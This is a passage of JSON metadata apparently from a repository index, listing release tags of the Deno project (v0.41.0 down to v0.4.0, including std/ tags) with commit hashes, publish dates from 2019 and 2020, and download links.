releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z